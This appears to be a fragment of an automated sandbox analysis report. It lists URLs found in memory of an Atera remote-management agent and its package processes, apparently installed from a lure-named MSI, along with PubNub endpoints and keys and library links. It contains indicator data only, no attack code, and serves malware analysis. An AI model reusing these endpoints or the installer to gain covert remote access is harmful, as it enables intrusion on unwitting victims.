                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.5/Agent.Package.Watchdog.zip?BjzRoF
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?BjzRoFMA/N
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/37.9/AgentPackageAgentInformati
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip?BjzRoF
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zipPG
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip?BjzR
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/36.9/AgentPackageMoni
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/36.9/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/36.9/AgentPackageMonitoring.zip?BjzRo
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/36.9/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zip?BjzRoFM
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/24.9/AgentPackageProgramManage
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip?BjzRoFMA/
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/26.8/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/26.8/AgentPackageSystemTools.zip?Bjz
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.5/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.5/AgentPackageTicketing.zip?BjzRoFM
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.2/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageADRemote/1.2/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageHeartbeat/16.9/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageInternalPoller/15.9/AgentPackageInternalPoller.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMarketplace/13.0/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitori8
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageOsUpdates/1.0/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageProgramManagement/15.5/AgentPackageProgramManageme
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zipPG
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSystemTools/18.9/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTicketing/18.9/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageUpgradeAgent/22.1/AgentPackageUpgradeAge
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageWindowsUpdate/18.3/AgentPackageWindowsUpdate.zip
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkg
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX
                                Source: AgentPackageSTRemote.exe, 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AgentPackageSTRemote.exe, 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exepUsers/Shared/Splashtop
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpString found in binary or memory: https://ps.atera.com/translations/TicketingTray/
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.comPG
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234004D6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882186000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340008B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234004D6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A37000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882192000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882186000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=34ec3643-2aa1-42a6-9922-90409c85adcc
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340008B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3f30da7a-a0ae-4884-90f3-df2ffec271de
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=4b2fb6bb-d29b-4140-ae57-fa11f9b3d691
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=5df3382d-fbc6-4dc1-a4cf-d657545b8fb0
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=8128d3bd-7c9a-4e6d-a3ed-ecdfd21beded
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=c53a2ddb-7432-4aa0-9512-6f69913c649f
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=f7e235eb-2d87-4583-baaf-a167106cfaad
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/pr
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/ch
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/3757c761
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/3757c761-9e50-4f15-8086
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://push.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.github.com/ferventcoder/checksum/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_config.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_install.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_outdated.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_search.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_uninstall.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_upgrade.gif
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/chocopro_install_stopped.gif
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpString found in binary or memory: https://setup-app-resolver.atera.com
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://sevenzip.osdn.jp/chm/general/formats.htm
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somelocation.com/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somelocation.com/thefile.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere.com/file-x64.msi
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere.com/file.msi
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere.com/file.mst
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere/bob-x64.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere/bob.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://somewhere/out/there.msi
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829423575.0000022AD9314000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://system.data.sqlite.org/X
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://urn.to/r/sds_see
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnosti
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://www.howsmyssl.com/
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: AgentPackageMonitoring.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1841793357.00007FFB03054000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
